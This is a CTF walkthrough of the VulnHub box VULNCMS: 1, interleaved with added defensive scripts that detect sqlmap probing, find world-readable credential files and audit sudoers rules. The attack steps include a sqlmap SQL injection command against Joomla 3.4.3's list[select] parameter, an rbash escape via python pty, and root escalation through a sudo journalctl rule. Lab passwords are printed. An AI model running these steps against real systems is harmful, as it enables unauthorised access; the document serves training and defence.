This is VULNCMS: 1 from VulnHub. We’ve got some new machines, so let’s go.


We’ve got SSH on 22 and a website on 80. Then we’ve got WordPress on 5000, Joomla on 8081 and Drupal on 9001. Where shall we start?


nmap says:

_http-generator: WordPress 5.7.2

That’s a recent version; if there was a vulnerability in WP core I’d probably have heard about it. Of course it could be a plugin, but let’s pass for now.


└─# droopescan scan drupal -u
[+] Plugins found:

[+] Themes found:

[+] Possible version(s):

[+] Possible interesting urls found:
    Default changelog file -

[+] Scan finished (0:00:07.905186 elapsed)

A quick search doesn’t find anything obvious for version 7.54; let’s move on.


└─# joomscan --url

This turns up:

[+] Detecting Joomla Version
[++] Joomla 3.4.3

Which is vulnerable to SQLi. There are some scripts; I run sqlmap with this command:

sqlmap -u "[ordering]=&item_id=75&type_id=1&list[select]=*"  --technique=E --dbs --dump

The moon rises and falls. Seasons change. Little babies grow into adults. Eventually, the entire database is dumped. Ok yes this was my fault for not optimising the query - but it’s my time I wasted.
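Seen from the other side of the wire, a sqlmap `--dump` of this kind is loud: the `list[select]` parameter stops looking like a column list, the scanner announces itself in the User-Agent, and one client hits the same endpoint thousands of times. The following is an added example for this write-up, not code from the original post or from sqlmap or Joomla; the access-log lines are constructed and the `list[select]` values in them are harmless placeholders, not the real payload.

```python
"""Flag sqlmap-style probing of a Joomla list[select] parameter in web server logs.

Added example for this write-up, not code from the original post. The access
log lines are constructed; the query parameters echo the ones in the sqlmap
command above (item_id, type_id, list[select]) without the injected payload.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format: ip ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# A legitimate list[select] is "*" or a comma-separated list of column names.
# Quotes, parentheses or spaces mean the value is being used to rewrite the query.
SAFE_SELECT = re.compile(r'^(\*|[A-Za-z0-9_.]+(,[A-Za-z0-9_.]+)*)$')

# Constructed sample: 10.0.0.9 is an ordinary visitor, 10.0.0.5 an automated scanner.
SAMPLE_LOG = [
    '10.0.0.9 - - [18/Jun/2021:10:40:01 +0000] "GET /index.php?item_id=75&type_id=1&list[select]=* HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Jun/2021:10:41:07 +0000] "GET /index.php?item_id=75&type_id=1&list[select]=*%2C(SELECT%201) HTTP/1.1" 500 412 "-" "sqlmap/1.5.6#stable (http://sqlmap.org)"',
    '10.0.0.5 - - [18/Jun/2021:10:41:07 +0000] "GET /index.php?item_id=75&type_id=1&list[select]=*%2C(SELECT%202) HTTP/1.1" 500 412 "-" "sqlmap/1.5.6#stable (http://sqlmap.org)"',
    '10.0.0.5 - - [18/Jun/2021:10:41:08 +0000] "GET /index.php?item_id=75&type_id=1&list[select]=* HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return a dict with ip, path, params, status, ua; None if the line is not combined format."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['url'])
    rec['path'] = parts.path
    rec['params'] = parse_qs(parts.query)   # percent-decodes values, so %2C becomes ","
    return rec


def find_alerts(lines, burst_threshold=200):
    """Return (ip, kind, detail) tuples. kinds: scanner-ua, select-tamper, burst.

    burst_threshold: requests from one ip to one path that count as a dump in
    progress (a full --dump is thousands of requests, hence the long wait above).
    """
    alerts = []
    per_client = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        per_client[(rec['ip'], rec['path'])] += 1
        if 'sqlmap' in rec['ua'].lower():
            alerts.append((rec['ip'], 'scanner-ua', rec['ua']))
        for value in rec['params'].get('list[select]', []):
            if not SAFE_SELECT.match(value):
                alerts.append((rec['ip'], 'select-tamper', value))
    for (ip, path), n in per_client.items():
        if n >= burst_threshold:
            alerts.append((ip, 'burst', f'{n} requests to {path}'))
    return alerts


if __name__ == '__main__':
    for ip, kind, detail in find_alerts(SAMPLE_LOG, burst_threshold=3):
        print(f'{ip:<10} {kind:<14} {detail}')
```

The User-Agent check is the weakest of the three, since `--random-agent` removes it; the shape of the `list[select]` value and the request rate per client survive that and are what an alert should key on.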

We get some hashes (can’t break), and this:

47,elliot,,1,5T3e!_M0un7i@N,, AND OTHER STUFF

With this credential, which was in the users table, we can SSH in as Elliot.


Elliot has rbash; don’t be like Elliot:

Last login: Thu Jun 17 11:49:58 2021 from
elliot@vuln_cms:~$ cd /
-rbash: cd: restricted
elliot@vuln_cms:~$ python3 -c 'import pty;pty.spawn("/bin/bash");'
elliot@vuln_cms:~$ cd /dev/shm

Elliot can’t run sudo. I run linpeas but get nothing very useful. I find this:

elliot@vuln_cms:/$ cd opt
elliot@vuln_cms:/opt$ ls -lash
total 12K
4.0K drwxr-xr-x  2 root root 4.0K May 31 07:59 .
4.0K drwxr-xr-x 24 root root 4.0K Jun 17 11:20 ..
4.0K -rw-r--r--  1 root root   69 May 31 07:58 8081.cred
elliot@vuln_cms:/opt$ cat 8081.cred 
Username: joomlaCMS_admin
Password: _q4gWWJuBWt8cqfbUm-cdevR?L@N7-pR

Not useful. I find this:

elliot@vuln_cms:/var/www/html/home/vulnerable$ ls -lash
total 2.0M
4.0K drwxr-xr-x 2 tyrell tyrell 4.0K May 31 07:45 .
4.0K drwxr-xr-x 3 tyrell tyrell 4.0K May 30 09:34 ..
1.3M -rw-r--r-- 1 tyrell tyrell 1.3M May 26 06:54 image1.png
 16K -rw-r--r-- 1 tyrell tyrell  15K May 26 06:55 image2.jpg
156K -rw-r--r-- 1 tyrell tyrell 153K May 26 06:55 image3.jpg
 96K -rw-r--r-- 1 tyrell tyrell  94K May 31 07:44 image4.jpg
352K -rw-r--r-- 1 tyrell tyrell 352K May 26 07:07 image5.jpg
 24K -rw-r--r-- 1 tyrell tyrell  22K May 26 07:08 image6.gif

Notice the date on image4 is different?

└─# stegseek image4.jpg
StegSeek version 0.5
Progress: 0.00% (0 bytes)

[i] --> Found passphrase: "123456789"
[i] Original filename: "wp_pass.txt"
[i] Extracting to "image4.jpg.out"
└─# cat image4.jpg.out
Random URLs are helpful but 5000 times

Not useful.
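Both of the finds so far, 8081.cred in /opt and the wp_pass.txt hidden in image4.jpg, are the same hygiene failure: a world-readable file that says "Password:" sitting where any local account can read it. A periodic host check catches this before a walkthrough does. The script below is an added example for this write-up, not code from the original post or from linpeas; it builds a constructed directory tree (placeholder secrets, not the box's real ones) and walks it looking for credential-like filenames and `Password:` lines, reporting whether each hit is readable by everyone.

```python
"""Find credential-bearing files that any local user can read.

Added example for this write-up, not code from the original post. It builds a
small constructed directory tree (placeholder secrets, not the box's real ones)
and then walks it the way a periodic host check would.
"""
import os
import re
import stat
import tempfile

# Filenames that are themselves a giveaway, like 8081.cred and wp_pass.txt above.
NAME_RE = re.compile(r'\.(cred|pass|pwd)$|pass(word)?\.txt$', re.IGNORECASE)
# "Password: ..." / "passwd=..." at the start of a line.
CRED_RE = re.compile(r'^\s*(password|passwd|pass|secret)\s*[:=]', re.IGNORECASE | re.MULTILINE)


def is_world_readable(path):
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def scan_tree(root, max_bytes=64 * 1024):
    """Return findings sorted by path; each has path, world_readable and the reasons it was flagged."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if NAME_RE.search(name):
                reasons.append('credential-like filename')
            try:
                with open(path, 'rb') as fh:
                    head = fh.read(max_bytes)    # only the first 64 KiB; large images cost nothing
            except OSError:
                continue
            if CRED_RE.search(head.decode('utf-8', errors='replace')):
                reasons.append('contains a Password: line')
            if reasons:
                findings.append({
                    'path': os.path.relpath(path, root).replace(os.sep, '/'),
                    'world_readable': is_world_readable(path),
                    'reasons': reasons,
                })
    return sorted(findings, key=lambda f: f['path'])


def build_demo_tree():
    """Constructed tree mirroring the shape of the box: /opt cred file, web root, one file done right."""
    root = tempfile.mkdtemp(prefix='credscan-')
    layout = {
        'opt/8081.cred': ('Username: joomlaCMS_admin\nPassword: PLACEHOLDER-not-the-real-one\n', 0o644),
        'www/wp_pass.txt': ('Random URLs are helpful but 5000 times\n', 0o644),
        'www/settings.php': ("<?php\n$databases['default']['default'] = array('password' => 'x');\n", 0o644),
        'etc/db.secret': ('password=PLACEHOLDER\n', 0o600),
    }
    for rel, (content, mode) in layout.items():
        path = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w') as fh:
            fh.write(content)
        os.chmod(path, mode)
    return root


if __name__ == '__main__':
    for f in scan_tree(build_demo_tree()):
        flag = 'WORLD-READABLE' if f['world_readable'] else 'ok (owner only)'
        print(f"{f['path']:<22} {flag:<16} {', '.join(f['reasons'])}")
```

The line-anchored regex deliberately does not fire on settings.php, whose database password is inside PHP array syntax; a real deployment would add per-application parsers for those config formats rather than loosen the regex and drown in false positives.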

Then I find this:

elliot@vuln_cms:/var/www/html/drupal/misc$ ls -lash
total 504K
4.0K drwxr-xr-x 4 tyrell tyrell 4.0K May 31 10:47 .
4.0K drwxr-xr-x 9 tyrell tyrell 4.0K May 31 09:17 ..
# snip
4.0K -rwxr-xr-x 1 tyrell tyrell  129 Feb  1  2017 tree-bottom.png
4.0K -rwxr-xr-x 1 tyrell tyrell  130 Feb  1  2017 tree.png
4.0K -rw-r--r-- 1 root   root     45 May 31 10:47 tyrell.pass
4.0K drwxr-xr-x 3 tyrell tyrell 4.0K Feb  1  2017 ui
# snip
elliot@vuln_cms:/var/www/html/drupal/misc$ cat tyrell.pass 
Username: tyrell
Password: mR_R0bo7_i5_R3@!_
elliot@vuln_cms:/var/www/html/drupal/misc$ su tyrell
tyrell@vuln_cms:/var/www/html/drupal/misc$ sudo -l
Matching Defaults entries for tyrell on vuln_cms:
    env_reset, mail_badpass,

User tyrell may run the following commands on vuln_cms:
    (root) NOPASSWD: /bin/journalctl

Definitely useful.

tyrell@vuln_cms:/var/www/html/drupal/misc$ sudo -u root /bin/journalctl
-- Logs begin at Fri 2021-05-28 12:16:41 UTC, end at Fri 2021-06-18 10:55:53 UTC
May 28 12:16:41 vuln_cms kernel: Linux version 4.15.0-143-generic (buildd@lcy01-
May 28 12:16:41 vuln_cms kernel: Command line: BOOT_IMAGE=/vmlinuz-4.15.0-143-ge
# snip
May 28 12:16:41 vuln_cms kernel: NX (Execute Disable) protection: active
# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
Fri Jun 18 10:56:11 UTC 2021
# cd /root
# ls
# cat root.txt

And done.
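The last step works because journalctl hands long output to an interactive pager, and a pager started under sudo runs as root and can start other programs; a NOPASSWD rule for it is therefore a root shell with extra typing. Reviewing sudoers for this class of rule is cheap. The script below is an added example for this write-up, not code from the original post or from sudo itself: it parses a constructed sudoers fragment (the tyrell/journalctl line is the rule from the box; the `--no-pager` variant is an assumed tighter rewrite, and the other users and commands are invented) and reports rules that are effectively unrestricted.

```python
"""Audit sudoers rules for commands that hand out more than they look like they do.

Added example for this write-up, not code from the original post. The sudoers
text is constructed; the tyrell/journalctl rule is the one from the box, the
--no-pager variant is an assumed tighter rewrite of it.
"""
import os
import re

# user host=(runas) [TAG:]* cmd[, cmd...]  (subset of sudoers syntax: no aliases, no continuations)
RULE_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z_]+:\s*)*)'
    r'(?P<cmds>.+)$'
)

# Binaries that pipe their output through an interactive pager when stdout is a
# terminal. journalctl is the one on this box; extend the set from your own review.
PAGER_BINARIES = {'journalctl'}

SAMPLE_SUDOERS = """
Defaults env_reset, mail_badpass
root      ALL=(ALL:ALL) ALL
tyrell    ALL=(root) NOPASSWD: /bin/journalctl                       # the rule on the box
tyrell    ALL=(root) NOPASSWD: /bin/journalctl --no-pager -u apache2 # assumed tighter rewrite
backup    ALL=(root) NOPASSWD: /usr/bin/rsync
www-data  ALL=(root) /usr/sbin/service apache2 reload
"""


def parse_sudoers(text):
    """One dict per (user, command) pair: user, runas, nopasswd, binary, args."""
    rules = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line or line.startswith('Defaults'):
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        tags = {t.rstrip(':') for t in m['tags'].split()}
        runas = (m['runas'] or 'root').split(':')[0].strip()
        for cmd in m['cmds'].split(','):
            parts = cmd.split()
            rules.append({'user': m['user'], 'runas': runas, 'nopasswd': 'NOPASSWD' in tags,
                          'binary': parts[0], 'args': parts[1:]})
    return rules


def audit(rules):
    """Return (user, reason) pairs for rules that amount to a root shell or are wider than needed."""
    findings = []
    for r in rules:
        if r['user'] == 'root' or r['runas'] not in ('root', 'ALL'):
            continue
        base = os.path.basename(r['binary'])
        if r['binary'] == 'ALL':
            findings.append((r['user'], 'may run anything as root'))
        elif base in PAGER_BINARIES and '--no-pager' not in r['args']:
            findings.append((r['user'], f"{r['binary']} pages its output; the pager runs as "
                                        f"{r['runas']} and can start other programs"))
        elif not r['args'] and r['nopasswd']:
            findings.append((r['user'], f"{r['binary']} with any arguments and no password"))
    return findings


if __name__ == '__main__':
    for user, reason in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f'{user:<10} {reason}')
```

Pinning the arguments in sudoers, as the `--no-pager -u apache2` line does, means sudo only accepts that exact command line, which is what the admin presumably intended when they gave tyrell log access; `env_reset`, already set on the box, is what stops a user from pointing the pager variables at something else, so both halves are needed.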